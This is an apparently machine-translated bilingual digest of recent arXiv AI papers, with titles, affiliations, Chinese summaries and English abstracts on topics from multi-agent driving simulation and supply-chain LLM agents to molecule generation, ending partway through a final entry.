行人行为不确定性下安全自动驾驶的多智能体强化学习

Prakash Aryan, Kaushik Raghupathruni, Timo Kehrer, Sebastiano Panichella

发表机构 * University of Bern(伯恩大学) AI4I, The Italian Institute of Artificial Intelligence(意大利人工智能研究所)

AI总结 本文使用多智能体近端策略优化(MAPPO)联合训练自动驾驶汽车和12个行人,通过隐藏的行人特质模拟乱穿马路行为,相比固定策略基线显著降低了碰撞率,并揭示了速度差异指标可用于检测未预期的乱穿马路行为。

Comments Accepted to ICRA 2026 Workshop "8th Workshop on Long-term Human Motion Prediction"

详情
AI中文摘要

自动驾驶汽车(SDC)的仿真测试通常依赖脚本化行人模型,这些模型无法捕捉真实过街行为的异质性和不确定性,限制了安全评估的真实性,尤其是对于由车辆无法观察到的潜在人格特质支配的乱穿马路行为。我们假设,通过多智能体强化学习(MARL)联合训练行人和SDC,相比针对固定行人策略训练,能产生更真实的交互场景,并且可预测与不可预测过街行为之间的差距可以直接从轨迹中测量。我们使用多智能体近端策略优化(MAPPO)联合训练一个SDC和12个行人:行人移动遵循脚本化的Dijkstra路径规划,而RL策略控制高层的前进/等待决策,乱穿马路概率取决于每个行人在回合开始时采样并隐藏于SDC的特质。在500回合评估中,联合训练的SDC达到78%的目标完成率,碰撞率为14%,而最佳基于规则的基线分别为35%和33%。速度差异指标显示,在近距离(0-3米)范围内,SDC在乱穿马路者附近比在人行横道使用者附近快2.65米/秒,表明乱穿马路遭遇未被预期。乱穿马路占过街事件的13%,但占碰撞的62%,并且联合训练相比单智能体RL减少了30%的碰撞,因为行人学会了在SDC高速接近时等待。

英文摘要

Simulation-based testing of self-driving cars (SDCs) typically relies on scripted pedestrian models that do not capture the heterogeneity and uncertainty of real crossing behavior, limiting the realism of safety assessments, especially for jaywalking, which is governed by latent personality traits the vehicle cannot observe. We hypothesize that jointly training pedestrians and the SDC with multi-agent reinforcement learning (MARL) yields more realistic interaction scenarios than training against fixed pedestrian policies, and that the behavior gap between predictable and unpredictable crossings can be measured directly from trajectories. We co-train an SDC and 12 pedestrians using Multi-Agent Proximal Policy Optimization (MAPPO): pedestrian locomotion follows scripted Dijkstra pathfinding while an RL policy controls high-level go/wait decisions, and jaywalking probability depends on a per-pedestrian trait sampled at episode start and hidden from the SDC. In 500-episode evaluations, the co-trained SDC reached 78% of goals with a 14% collision rate, versus 35%/33% for the best rule-based baseline. A speed differential metric shows the SDC traveled 2.65 m/s faster near jaywalkers than near crosswalk users at close range (0-3 m), indicating jaywalking encounters were not anticipated. Jaywalking was 13% of crossing events but 62% of collisions, and co-training reduced collisions by 30% relative to single-agent RL as pedestrians learned to wait when the SDC approached at speed.

2605.19186 2026-05-27 cs.AI 版本更新

Discoverable Agent Knowledge -- A Formal Framework for Agentic KG Affordances (Extended Version)

可发现的智能体知识——智能体知识图谱能力的形式化框架(扩展版)

Terry R. Payne, Valentina Tamma, Enrico Daga

发表机构 * School of Computer Science and Informatics, University of Liverpool, UK(利物浦大学计算机科学与信息学学院) Open University(开放大学)

AI总结 本文提出一个四维形式化框架(语义表达性、智能体可发现性、任务相对基础性和认知信任范围),并从中推导出智能体能力概况(AAP),作为VoID和DCAT之上的语义层,支持智能体在规划时进行原则性的知识图谱选择、组合和故障诊断。

详情
AI中文摘要

二十年前,语义网服务社区被问及具有不同本体承诺的智能体如何能够连贯地发现、组合和调用网络服务。答案是OWL-S和WSMO:形式化的能力描述,指定服务能做什么、智能体为了认知上合理调用必须已经知道什么,以及如何形式化地桥接本体不匹配。当前的知识图谱元数据标准(如VoID和DCAT)描述了知识图谱包含什么,但没有说明特定智能体能从中证明什么、空结果受什么封闭假设支配,或者智能体的任务词汇是否在模式中有基础。此外,在已部署的知识图谱中,控制模式描述逻辑和操作性的蕴涵机制可能不同:这是一种当前元数据不可见的认知失效模式。我们针对知识图谱环境重新审视并扩展这些见解,提出了一个四维形式化框架:语义表达性、智能体可发现性、任务相对基础性和认知信任范围,从中我们推导出智能体能力概况(AAP):一个位于VoID和DCAT之上的语义层,使智能体在规划时能够进行原则性的知识图谱选择、组合和故障诊断。这四个维度在单个智能体层面操作化了本体连续体的能力结构,特别用于知识图谱选择、组合和故障诊断。一个来自学术搜索任务的实例具体化了该框架,并通过五点研究议程指出了实现基于AAP的能力匹配规模化所需的形式化、计算和工程工作。

英文摘要

Two decades ago, the Semantic Web Services community was asked how agents with different ontological commitments could discover, compose, and invoke web services coherently. The response was OWL-S and WSMO: formally grounded capability descriptions specifying what a service could do, what the agent must already know for invocation to be epistemically sound, and how ontological mismatches could be formally bridged. Current KG metadata standards such as VoID and DCAT describe what a KG contains, yet say nothing about what a specific agent can prove from it, what closure assumptions govern empty results, or whether the agent's task vocabulary is grounded in the schema. Furthermore, in deployed KGs the governing schema DL and the operative entailment regime can diverge: an epistemic failure mode invisible to current metadata. We revisit and extend these insights for the KG setting with a four-dimensional formal framework; Semantic Expressivity, Agentic Discoverability, Task-Relative Grounding, and Epistemic Trust Scope, from which we derive the Agentic Affordance Profile (AAP): a semantic layer above VoID and DCAT enabling principled KG selection, composition, and failure diagnosis at agent planning time. The four dimensions operationalise the affordance structure of the Ontological Continuum at the individual-agent level, specifically for \kg selection, composition, and failure diagnosis. A worked example drawn from a scholarly-search task concretely grounds the framework, and identifies the formal, computational, and engineering work needed to realise AAP-based affordance matching at scale though a five-point research agenda.

2605.17036 2026-05-27 cs.AI cs.LG cs.MA cs.SY eess.SY 版本更新

Reliability and Effectiveness of Autonomous AI Agents in Supply Chain Management

自主AI代理在供应链管理中的可靠性与有效性

Carol Xuan Long, David Simchi-Levi, Feng Zhu, Huangyuan Su, Andre P. Calmon, Flavio P. Calmon

发表机构 * Harvard University(哈佛大学) MIT/Purdue(麻省理工学院/普渡大学) MIT(麻省理工学院) Harvard University/Kempner Institute(哈佛大学/凯普勒研究所) Georgia Tech(佐治亚理工学院)

AI总结 本文通过MIT啤酒游戏研究多级供应链中的自主生成式AI代理,发现模型能力是性能主导因素,但平均性能掩盖可靠性风险,并引入代理牛鞭效应,提出基于GRPO的后训练框架以提高可靠性。

详情
AI中文摘要

本文使用MIT啤酒游戏研究多级供应链中的自主生成式AI代理。我们确定了影响性能的四个推理时杠杆:模型选择、策略和护栏、集中数据共享以及提示工程。模型能力是主导因素:开箱即用的推理模型超越人类水平性能,优化后的推理模型相对于人类团队将成本降低高达67%。然而,强劲的平均性能掩盖了显著的可靠性风险。我们引入了代理牛鞭效应:自主多级系统中运行间决策不稳定性的放大。其中一个核心组成部分是决策牛鞭效应,即由随机代理决策而非客户需求变化产生的订单变异性部分。我们表明,即使需求路径固定,决策不稳定性也可以在固定时间点跨设施以及同一设施内随时间放大。重复采样(一种自然的测试时补救措施)未能显著减少这种不稳定性,这表明可靠性需要改变底层决策策略,而不仅仅是平均模型输出。为解决这一限制,我们提出了一种基于组相对策略优化(GRPO)的强化学习后训练框架,该框架使用系统级供应链奖励训练共享的基础LLM。后训练显著减少了尾部事件,抑制了代理牛鞭效应,并提高了自主供应链代理的可靠性。

英文摘要

This paper studies autonomous generative AI agents in multi-echelon supply chains using the MIT Beer Game. We identify four inference-time levers that shape performance: model selection, policies and guardrails, centralized data sharing, and prompt engineering. Model capability is the dominant factor: an out-of-the-box reasoning model exceeds human-level performance, and optimized reasoning models reduce costs by up to 67% relative to human teams. However, strong average performance masks substantial reliability risks. We introduce agent bullwhip: the amplification of run-to-run decision instability in autonomous multi-echelon systems. A central component is decision bullwhip, the portion of order variability generated by stochastic agent decisions rather than by changes in customer demand. We show that decision instability can amplify both across facilities at a fixed point in time and within the same facility over time, even when the demand path is held fixed. Repeated sampling, a natural test-time remedy, fails to meaningfully reduce this instability, suggesting that reliability requires changing the underlying decision policy rather than merely averaging over model outputs. To address this limitation, we propose a Group Relative Policy Optimization (GRPO)-based reinforcement-learning post-training framework that trains a shared base LLM using system-level supply-chain rewards. Post-training substantially reduces tail events, curtails agent bullwhip, and improves the reliability of autonomous supply-chain agents.

2605.16457 2026-05-27 cs.LG cs.AI cs.CV 版本更新

Identifiable Token Correspondence for World Models

可辨识的令牌对应关系用于世界模型

Youngin Kim, Ray Sun, Inho Kim, Bumsoo Park, Hyun Oh Song

发表机构 * Interdisciplinary Program in Artificial Intelligence, Seoul National University(人工智能交叉学科项目,首尔国立大学) Department of Computer Science(计算机科学系) Engineering, Seoul National University(工程系,首尔国立大学)

AI总结 提出可辨识的令牌对应关系(ITC)方法,通过将下一帧预测建模为结构化分配问题,解决基于令牌的Transformer世界模型在长程推演中的时间不一致性,在四个基准上达到最先进性能。

详情
AI中文摘要

基于令牌的Transformer世界模型在视觉强化学习中表现出色,但常在长程推演中出现时间不一致性,包括对象重复、消失和变形。一个关键原因是大多数现有方法将下一帧预测纯粹视为令牌生成问题,而未考虑令牌在时间上的持续性。我们引入可辨识的令牌对应关系(ITC),这是一种用于基于令牌的Transformer世界模型的解码步骤,将下一帧预测建模为具有潜在令牌对应变量的结构化分配问题:每个下一帧令牌要么通过从上一帧复制令牌来解释,要么通过生成新令牌来解释。ITC保持Transformer架构和训练过程不变,可以添加到现有骨干网络上。我们的实验在4个具有挑战性的基准上展示了最先进的性能。所提出的方法在Craftax-classic基准上实现了72.5%的回报率和35.6%的分数,显著超过了之前的最佳结果67.4%和27.9%。我们在https://github.com/snu-mllab/Identifiable-Token-Correspondence上发布了源代码。

英文摘要

Token-based transformer world models have shown strong performance in visual reinforcement learning, but often suffer from temporal inconsistency in long-horizon rollouts, including object duplication, disappearance, and transmutation. A key reason is that most existing approaches treat next-frame prediction purely as a token generation problem, without considering the persistence of tokens across time. We introduce Identifiable Token Correspondence (ITC), a decoding step for token-based transformer world models that formulates next-frame prediction as a structured assignment problem with latent token correspondence variables: each next-frame token is explained either by copying a token from the previous frame or by generating a new one. ITC leaves the transformer architecture and training procedure unchanged and can be added on top of existing backbones. Our experiments show state-of-the-art performance on 4 challenging benchmarks. The proposed method achieves a return of 72.5% and a score of 35.6% on the Craftax-classic benchmark, significantly surpassing the previous best of 67.4% and 27.9%. We release our source code on https://github.com/snu-mllab/Identifiable-Token-Correspondence.

2605.04880 2026-05-27 cs.LG cs.AI 版本更新

A Harmonic Mean Formulation of Average Reward Reinforcement Learning in SMDPs

SMDP中平均奖励强化学习的调和均值公式

Erel Shtossel, Alicia Vidler, Uri Shaham, Gal A. Kaminka

发表机构 * Bar Ilan University(巴伊兰大学)

AI总结 针对无限时域非回合制任务中的平均奖励强化学习,提出一种修正的调和均值算子,解决SMDP中奖励和持续时间非平稳时的奖励率计算问题,并证明其理论性质及有效性。

详情
Journal ref
https://alaworkshop2026.github.io/papers/ALA2026_paper_57.pdf
AI中文摘要

最近的研究重新激发并增强了对无限时域、非回合制(持续)任务中未折扣平均奖励强化学习算法的兴趣。半马尔可夫决策过程(SMDP)尤其引人关注。在SMDP中,离散动作随机产生奖励和持续时间,目标是优化平均奖励率。现有算法通过优化奖励与持续时间的比率来逼近这一目标。然而,当奖励和持续时间(在无限时域中)非平稳时,这种方法可能不正确。本文提出一种新颖的修正调和均值算子,即使在上述条件下也能正确计算奖励率。这产生了可以与SMDP一起工作的无模型学习算法,同时保持对随时间变化的非平稳奖励和持续时间分布的鲁棒性。我们证明了修正调和均值算子的理论性质,并通过实验与现有算法相比展示了其有效性。

英文摘要

Recent research has revived and amplified interest in algorithms for undiscounted average reward reinforcement learning in infinite-horizon, non-episodic (continuing) tasks. Semi-Markov decision processes (SMDPs) are of particular interest. In SMDPs, discrete actions stochastically generate both rewards and durations, and the objective is to optimize the average reward rate. Existing algorithms approach this by optimizing the ratio of rewards to durations. However, when rewards and durations are non-stationary (in the infinite horizon), this can be incorrect. This paper presents a novel modified harmonic mean operator that correctly computes reward rates even under such conditions. This yields model-free learning algorithms that can work with SMDPs, while maintaining robustness to non-stationary reward and duration distributions over time. We prove theoretical properties of the modified harmonic mean operator, and empirically demonstrate its efficacy in comparison to existing algorithms.

2605.02207 2026-05-27 cs.CV cs.AI cs.LG 版本更新

MultiSense-Pneumo: A Multimodal Learning Framework for Pneumonia Screening in Resource-Constrained Settings

MultiSense-Pneumo:面向资源受限环境中肺炎筛查的多模态学习框架

Dineth Jayakody, Pasindu Thenahandi, Chameli Dommanige

发表机构 * Department of Computer Science, Old Dominion University, VA, USA(计算机科学系,老 Dominion 大学,弗吉尼亚州,美国)

AI总结 提出MultiSense-Pneumo多模态原型系统,整合症状、咳嗽音频、语音和胸片,通过可解释的后期融合实现肺炎筛查与分诊支持。

详情
AI中文摘要

肺炎仍然是全球发病率和死亡率的主要原因,尤其是在低资源环境中,那里缺乏影像学、实验室检测和专科护理。临床评估依赖于异质性证据,包括症状、呼吸模式、口头描述和胸部影像,使得一线筛查本质上是多模态的。然而,许多现有的计算方法仍然是单模态的,并且主要关注放射影像。在这项工作中,我们提出了MultiSense-Pneumo,一个面向肺炎筛查和分诊支持的多模态研究原型,它整合了结构化症状描述符、咳嗽音频、口语和胸部X光片。该系统结合了确定性症状分诊、基于LightGBM的声学分类、使用ResNet-18的域对抗放射影像分析、基于Transformer的语音识别以及可解释的后期融合算子。每个模态被转换为归一化的关注信号,并聚合为统一的筛查估计。融合权重是手动指定的,被视为启发式、可解释的参数,而不是学习或临床优化的值。MultiSense-Pneumo的设计考虑了在标准笔记本电脑级硬件上的离线执行,但并未作为经过部署验证或临床验证的诊断系统呈现。实验结果表明,在合成域偏移下,放射影像路径具有强大的组件级性能,同时也突出了重要的局限性,特别是咳嗽声学的异常类别召回率降低以及缺乏配对的端到端多模态患者评估。因此,MultiSense-Pneumo旨在作为筛查和分诊研究的框架和组件级原型。

英文摘要

Pneumonia remains a leading global cause of morbidity and mortality, particularly in low-resource settings where access to imaging, laboratory testing, and specialist care is limited. Clinical assessment relies on heterogeneous evidence, including symptoms, respiratory patterns, spoken descriptions, and chest imaging, making frontline screening inherently multimodal. However, many existing computational approaches remain unimodal and focus primarily on radiographs. In this work, we present MultiSense-Pneumo, a multimodal research prototype for pneumonia-oriented screening and triage support that integrates structured symptom descriptors, cough audio, spoken language, and chest radiographs. The system combines deterministic symptom triage, LightGBM-based acoustic classification, domain-adversarial radiograph analysis using ResNet-18, transformer-based speech recognition, and an interpretable late-fusion operator. Each modality is transformed into a normalized concern signal and aggregated into a unified screening estimate. The fusion weights are hand-specified and are treated as heuristic, interpretable parameters rather than learned or clinically optimized values. MultiSense-Pneumo is implemented with offline execution in mind on standard laptop-class hardware, but it is not presented as a deployment-validated or clinically validated diagnostic system. Experimental results demonstrate strong component-level performance of the radiograph pathway under synthetic domain shifts, while also highlighting important limitations, especially reduced abnormal-class recall for cough acoustics and the absence of paired end-to-end multimodal patient evaluation. MultiSense-Pneumo is therefore intended as a framework and component-level prototype for screening and triage research.

2605.08146 2026-05-27 cs.CV cs.AI 版本更新

VT-Bench: A Unified Benchmark for Visual-Tabular Multi-Modal Learning

VT-Bench:视觉-表格多模态学习的统一基准

Zi-Yi Jia, Zi-Jian Cheng, Xin-Yue Zhang, Kun-Yang Yu, Zhi Zhou, Yu-Feng Li, Lan-Zhe Guo

发表机构 * National Key Laboratory for Novel Software Technology, Nanjing University, China(新型软件技术国家重点实验室,南京大学,中国) School of Intelligence Science and Technology, Nanjing University, China(智能科学与技术学院,南京大学,中国) School of Artificial Intelligence, Nanjing University, China(人工智能学院,南京大学,中国)

AI总结 提出首个视觉-表格多模态基准VT-Bench,涵盖9个领域14个数据集,评估23个模型,揭示视觉-表格学习的挑战。

详情
AI中文摘要

多模态学习在视觉-文本任务中引起了广泛关注。然而,在医疗和工业等高危领域起关键作用的视觉-表格数据仍未得到充分探索。本文介绍了 extit{VT-Bench},这是第一个用于标准化视觉-表格判别预测和生成推理任务的统一基准。VT-Bench汇集了9个领域(以医疗为中心,同时涵盖宠物、媒体和交通)的14个数据集,超过756K个样本。我们评估了23个代表性模型,包括单模态专家、专门的视觉-表格模型、通用视觉-语言模型(VLM)和工具增强方法,突出了视觉-表格学习的重大挑战。我们相信VT-Bench将激励社区构建更强大的多模态视觉-表格基础模型。 基准:https://github.com/Ziyi-Jia990/VT-Bench

英文摘要

Multi-model learning has attracted great attention in visual-text tasks. However, visual-tabular data, which plays a pivotal role in high-stakes domains like healthcare and industry, remains underexplored. In this paper, we introduce \textit{VT-Bench}, the first unified benchmark for standardizing vision-tabular discriminative prediction and generative reasoning tasks. VT-Bench aggregates 14 datasets across 9 domains (medical-centric, while covering pets, media, and transportation) with over 756K samples. We evaluate 23 representative models, including unimodal experts, specialized visual-tabular models, general-purpose vision-language models (VLMs), and tool-augmented methods, highlighting substantial challenges of visual-tabular learning. We believe VT-Bench will stimulate the community to build more powerful multi-modal vision-tabular foundation models. Benchmark: https://github.com/Ziyi-Jia990/VT-Bench

2605.18866 2026-05-27 cs.LG cs.AI 版本更新

FLUIDSPLAT: Reconstructing Physical Fields from Sparse Sensors via Gaussian Primitives

FLUIDSPLAT: 通过高斯原语从稀疏传感器重建物理场

Huaxi Huang, Meng Li, Zhengqing Gao, Xi Zhou, Xiaoshui Huang, Xiao Sun

发表机构 * Shanghai Artificial Intelligence Laboratory(上海人工智能实验室) The Hong Kong University of Science and Technology(香港科学与技术大学) Mohamed bin Zayed University of Artificial Intelligence(莫扎德·本·扎耶德人工智能大学) Shanghai Jiaotong University(上海交通大学)

AI总结 提出FLUIDSPLAT模型,利用高斯原语作为空间显式中间表示,从稀疏传感器数据重建流场,理论分析了表示能力与观测数的关系,并在多个基准上实现误差降低11-28%。

Comments 24 pages, 5 figures,preprint

详情
AI中文摘要

从稀疏表面安装的传感器重建连续流场是空气动力学设计、流动控制和数字孪生仪器的核心。现有的神经方法通常将传感器读数编码为隐式潜在代码,空间可解释性差,且关于表示能力应如何随观测数量扩展的正式指导有限。受3D高斯泼溅启发,我们引入FLUIDSPLAT,一种传感器条件模型,预测K个各向异性高斯原语,形成单位划分支架,即流场的空间显式且可解释的中间表示。对于理想化的高斯原语估计器,我们证明了对于具有Sobolev光滑度s的场,逼近率为$O(K^{-s/d})$;结合N个含噪声观测,得到偏差$O(K^{-2s/d})$和方差$O(σ^{2}K/N)$的平方风险分解。平衡两者得到$K^{*}\!\sim\!(N/σ^{2})^{d/(2s+d)}$:在稀疏传感下原语数量不能自由增长,揭示了方差瓶颈,促使用状态条件残差解码器补充支架。在涵盖2D和3D的四个基准(圆柱绕流、AirfRANS、FlowBench LDC-3D和PhySense-Car 3D)上,FLUIDSPLAT相比多个强基线实现了11-28%的误差降低。

英文摘要

Reconstructing continuous flow fields from sparse surface-mounted sensors is central to aerodynamic design, flow control, and digital-twin instrumentation. Existing neural methods for this task typically encode sensor readings into implicit latent codes with little spatial interpretability and limited formal guidance on how representational capacity should scale with observation count. Inspired by 3D Gaussian Splatting, we introduce FLUIDSPLAT, a sensor-conditioned model that predicts K anisotropic Gaussian primitives forming a partition-of-unity scaffold, a spatially explicit and interpretable intermediate representation of the flow. For an idealized Gaussian primitive estimator, we prove an $O(K^{-s/d})$ approximation rate for fields with Sobolev smoothness $s$; incorporating $N$ noisy observations yields a squared-risk decomposition with bias $O(K^{-2s/d})$ and variance $O(σ^{2}K/N)$.Balancing the two yields $K^{*}\!\sim\!(N/σ^{2})^{d/(2s+d)}$: primitive count cannot grow freely under sparse sensing, revealing a variance bottleneck that motivates complementing the scaffold with a state-conditioned residual decoder. Across four benchmarks spanning 2D and 3D, FLUIDSPLAT achieves 11-28% error reduction over several strong baselines on cylinder flow, AirfRANS, FlowBench LDC-3D, and PhySense-Car 3D benchmarks.

2605.18592 2026-05-27 cs.LG cs.AI cs.CL 版本更新

AMARIS: A Memory-Augmented Rubric Improvement System for Rubric-Based Reinforcement Learning

AMARIS: 一种用于基于评分标准的强化学习的记忆增强评分标准改进系统

Peilin Wu, Xinlu Zhang, Kun Wan, Wentian Zhao, Gang Wu, Xinya Du, Zhiyu Chen

发表机构 * The University of Texas at Dallas(德克萨斯大学达拉斯分校) Adobe Inc.(Adobe公司) Department of Computer Science, University of California, Santa Barbara(加州大学圣芭芭拉分校计算机科学系)

AI总结 提出AMARIS系统,通过持久化评估记忆存储纵向训练证据来改进评分标准,在科学、医学、指令遵循和创意写作任务上优于静态、局部自适应和无记忆基线方法。

Comments Preprint. Under review

详情
AI中文摘要

基于评分标准的奖励塑形为通过强化学习(RL)微调大语言模型(LLMs)提供了可解释且可编辑的奖励信号,但现有的自适应评分标准方法通常从局部证据(如当前批次或实例级比较)更新标准。这种局部视角丢弃了训练过程中产生的诊断信息,使得难以跟踪重复失败、评估之前的评分标准编辑或在早期标准饱和后提高标准。我们引入了AMARIS,一种记忆增强的评分标准改进系统,它将评分标准更新建立在纵向训练证据之上。AMARIS将轨迹分析、步骤级摘要和评分标准更新记录存储在持久化评估记忆中,然后检索最近和语义相关的历史来修订评分标准。我们在全局和实例特定评分标准设置下,在科学、医学、指令遵循和创意写作任务上评估了AMARIS。AMARIS在静态、局部自适应和无记忆基线上有所改进,例如在GPQA-Diamond上比最强基线高出+2.8分,在IFBench上高出+2.2分,同时分析表明记忆减少了振荡性的评分标准编辑,并支持从早期错误纠正到后期课程推进的进展。AMARIS与正常RL循环异步运行,相对于同步评分标准更新减少了阻塞延迟。

英文摘要

Rubric-based reward shaping provides interpretable and editable reward signals for fine-tuning LLMs via reinforcement learning (RL), but existing adaptive rubric methods typically update criteria from local evidence such as the current batch or instance-level comparisons. This local view discards diagnostic information produced during training, making it difficult to track recurring failures, evaluate previous rubric edits, or raise standards once earlier criteria become saturated. We introduce AMARIS, A Memory-Augmented Rubric Improvement System that grounds rubric updates in longitudinal training evidence. AMARIS stores rollout analyses, step-level summaries, and rubric update records in a persistent evaluation memory, then retrieves recent and semantically relevant history to revise rubrics. We evaluate AMARIS across science, medicine, instruction following, and creative writing under both global and instance-specific rubric settings. AMARIS improves over static, local-adaptive, and memory-ablated baselines, such as +2.8 points on GPQA-Diamond and +2.2 points on IFBench over the strongest baselines, while analysis shows that memory reduces oscillatory rubric edits and supports a progression from early failure correction to later curriculum advancement. AMARIS runs asynchronously alongside the normal RL loop, reducing blocking latency relative to synchronous rubric updates.

2605.17617 2026-05-27 cs.AI 版本更新

GraphMind: From Operational Traces to Self-Evolving Workflow Automation

GraphMind:从操作轨迹到自演化工作流自动化

Yiwen Zhu, Joyce Cahoon, Anna Pavlenko, Qiushi Bai, Nima Shahbazi, Divya Vermareddy, Meina Wang, Mathieu Demarne, Swati Bararia, Wenjing Wang, Hemkesh Vijaya Kumar, Hannah Lerner, Katherine Lin, Steve Toscano, Miso Cilimdzic, Subru Krishnan

发表机构 * Microsoft, USA University of Illinois Chicago, USA Microsoft, Spain

AI总结 提出GraphMind系统,通过离线提取因果工作流图、在线多智能体遍历执行和自适应遍历强化,实现云数据库事故调查中的自动化工作流,相比基线方法减少8倍检索上下文并降低26%幻觉率。

详情
AI中文摘要

协调人员、工具和信息的复杂操作工作流是系统运行的核心,但由于需要大量人工输入且适应能力有限,端到端自动化仍然具有挑战性。我们提出GraphMind,一个以最小人力构建、执行和演化以行动为中心的工作流图的系统。该系统分三个阶段运行。首先,一个可扩展的离线管道从大量人工解决轨迹中提取结构化工作流图,捕捉问题、行动及其因果关系。其次,一个在线多智能体遍历引擎导航该图以动态构建和执行工作流,每一步结合图引导检索与LLM驱动的推理。第三,自适应遍历强化(ATR)强化成功的遍历路径,实现执行信息引导的图适应。GraphMind已部署在四个生产云数据库服务中用于事故调查。在93个保留事故上评估并通过盲审专家验证,该系统在缓解范围、幻觉率和诊断吞吐量方面优于Agentic Summary-RAG基线,同时需要少8倍的检索上下文。ATR层将幻觉率降低26%,证明工作流图可以从执行反馈中学习。一项为期12周的现场研究证实了实用价值:97%的评分对话在交互延迟内产生可操作结果。

英文摘要

Complex operational workflows coordinating personnel, tools, and information are central to system operations, yet end-to-end automation remains challenging due to extensive human input requirements and limited ability to adapt over time. We present GraphMind, a system that constructs, executes, and evolves action-centric workflow graphs with minimal human effort. The system operates in three phases. First, a scalable offline pipeline extracts structured workflow graphs from large volumes of human resolution traces, capturing problems, actions, and their causal relationships. Second, an online multi-agent traversal engine navigates the graph to dynamically construct and execute workflows, combining graph-guided retrieval with LLM-driven reasoning at each step. Third, Adaptive Traversal Reinforcement (ATR) reinforces successful traversal paths, enabling execution-informed graph adaptation. GraphMind has been deployed across four production cloud database services for incident investigation. Evaluated on 93 held-out incidents and validated via blind expert review, the system outperforms an Agentic Summary-RAG baseline in mitigation reach, hallucination rate, and diagnostic throughput while requiring 8x less retrieval context. The ATR layer reduces hallucination rate by 26%, demonstrating that workflow graphs can learn from execution feedback. A 12-week field study confirms practical value: 97% of scored conversations yield actionable results within interactive latency.

2603.04639 2026-05-27 cs.RO cs.AI 版本更新

RoboMME: Benchmarking and Understanding Memory for Robotic Generalist Policies

RoboMME:机器人通用策略的记忆基准与理解

Yinpei Dai, Hongze Fu, Jayjun Lee, Yuejiang Liu, Haoran Zhang, Jianing Yang, Chelsea Finn, Nima Fazeli, Joyce Chai

发表机构 * University of Michigan(密歇根大学) Stanford University(斯坦福大学) Figure AI

AI总结 提出RoboMME基准,通过16个操作任务评估VLA模型在长时程和历史依赖场景中的记忆能力,并基于π0.5骨干网络探索14种记忆增强变体,发现记忆表示的有效性高度依赖于任务。

Comments Accepted to ICML 2026

详情
AI中文摘要

记忆对于长时程和历史依赖的机器人操作至关重要。这类任务通常涉及计数重复动作或操作暂时被遮挡的物体。最近的视觉-语言-动作(VLA)模型已开始融入记忆机制;然而,它们的评估仍局限于狭窄、非标准化的设置中。这限制了对记忆的系统理解、比较和进展测量。为应对这些挑战,我们引入了RoboMME:一个大规模标准化基准,用于评估和推进VLA模型在长时程、历史依赖场景中的表现。我们的基准包含16个操作任务,这些任务基于精心设计的分类法构建,该分类法评估时间、空间、对象和程序记忆。我们进一步开发了一套基于π0.5骨干网络的14种记忆增强VLA变体,以系统探索多种集成策略下的不同记忆表示。实验结果表明,记忆表示的有效性高度依赖于任务,每种设计在不同任务中都有独特的优势和局限性。视频和代码可在我们的网站https://robomme.github.io上找到。

英文摘要

Memory is critical for long-horizon and history-dependent robotic manipulation. Such tasks often involve counting repeated actions or manipulating objects that become temporarily occluded. Recent vision-language-action (VLA) models have begun to incorporate memory mechanisms; however, their evaluations remain confined to narrow, non-standardized settings. This limits systematic understanding, comparison, and progress measurement. To address these challenges, we introduce RoboMME: a large-scale standardized benchmark for evaluating and advancing VLA models in long-horizon, history-dependent scenarios. Our benchmark comprises 16 manipulation tasks constructed under a carefully designed taxonomy that evaluates temporal, spatial, object, and procedural memory. We further develop a suite of 14 memory-augmented VLA variants built on the π0.5 backbone to systematically explore different memory representations across multiple integration strategies. Experimental results show that the effectiveness of memory representations is highly task-dependent, with each design offering distinct advantages and limitations across different tasks. Videos and code can be found at our website https://robomme.github.io.

2412.18084 2026-05-27 cs.AI 版本更新

Property Enhanced Instruction Tuning for Multi-task Molecule Generation with Large Language Models

属性增强指令微调用于大型语言模型的多任务分子生成

Xuan Lin, Long Chen, Yile Wang, Yangyang Chen, Xiangxiang Zeng

发表机构 * School of Computer Science, Xiangtan University(湘潭大学计算机科学学院) College of Computer Science and Software Engineering, Shenzhen University(深圳大学计算机科学与软件工程学院) Department of Computer Science, University of Tsukuba(东京大学理工学部) College of Computer Science and Electronic Engineering, Hunan University(湖南大学计算机科学与电子工程学院)

AI总结 提出PEIT框架,通过多模态对齐预训练和指令微调,提升LLM在分子描述、文本分子生成、属性预测和多约束分子生成任务上的性能。

Comments 9

详情
AI中文摘要

大型语言模型(LLMs)广泛应用于各种自然语言处理任务,如问答和机器翻译。然而,由于缺乏标记数据以及生化属性手动标注的困难,分子生成任务的性能仍然有限,尤其是涉及多属性约束的任务。在这项工作中,我们提出了一个两步框架PEIT(属性增强指令微调)来改进LLMs在分子相关任务上的表现。第一步,我们使用文本描述、SMILES和生化属性作为多模态输入,通过对齐多模态表示来合成指令数据,预训练一个名为PEIT-GEN的模型。第二步,我们使用合成数据微调现有的开源LLMs,得到的PEIT-LLM可以处理分子描述、基于文本的分子生成、分子属性预测以及我们新提出的多约束分子生成任务。实验结果表明,我们的预训练模型PEIT-GEN在分子描述任务上优于MolT5、BioT5、MolCA和Text+Chem-T5,证明了文本描述、结构和生化属性之间的模态对齐良好。此外,PEIT-LLM在多任务分子生成中显示出有希望的改进,证明了PEIT框架在分子任务中的有效性。代码和附录可在https://github.com/chenlong164/PEIT获取。

英文摘要

Large language models (LLMs) are widely applied in various natural language processing tasks such as question answering and machine translation. However, due to the lack of labeled data and the difficulty of manual annotation for biochemical properties, the performance for molecule generation tasks is still limited, especially for tasks involving multi-properties constraints. In this work, we present a two-step framework PEIT (\textbf{P}roperty \textbf{E}nhanced \textbf{I}nstruction \textbf{T}uning) to improve LLMs for molecular-related tasks. In the first step, we use textual descriptions, SMILES, and biochemical properties as multimodal inputs to pre-train a model called PEIT-GEN, by aligning multi-modal representations to synthesize instruction data. In the second step, we fine-tune existing open-source LLMs with the synthesized data, the resulting PEIT-LLM can handle molecule captioning, text-based molecule generation, molecular property prediction, and our newly proposed multi-constraint molecule generation tasks. Experimental results show that our pre-trained PEIT-GEN outperforms MolT5, BioT5, MolCA and Text+Chem-T5 in molecule captioning, demonstrating modalities align well between textual descriptions, structures, and biochemical properties. Furthermore, PEIT-LLM shows promising improvements in multi-task molecule generation, demonstrating the effectiveness of the PEIT framework for molecular tasks. The code and appendix are available at https://github.com/chenlong164/PEIT.

2603.12592 2026-05-27 cs.DS cs.AI cs.RO 版本更新

Early Pruning for Public Transport Routing

公共交通路由的早期剪枝

Andrii Rohovyi, Abdallah Abuaisha, Toby Walsh

